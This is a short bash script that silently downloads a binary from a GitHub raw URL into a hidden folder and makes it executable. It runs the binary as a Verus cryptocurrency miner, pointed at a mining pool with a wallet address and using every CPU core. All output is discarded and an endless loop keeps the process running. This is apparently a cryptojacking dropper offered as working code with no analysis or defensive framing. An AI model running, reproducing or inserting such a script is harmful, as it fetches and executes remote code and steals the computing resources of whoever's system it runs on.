#!/bin/bash
mkdir .kap && cd .kap
wget -O bubux https://github.com/nonibihan/tah/raw/refs/heads/main/bct >/dev/null 2>&1
chmod 777 bubux
./bubux -a verus -o stratum+tcp://sg.vipor.net:5040 -u RXHsLBjpWDNbPo4ZJYnmzd2mRT7YCJnk58.GASS -t $(nproc --all) >/dev/null 2>&1
while [ 1 ]; do
sleep 3
done
sleep 999
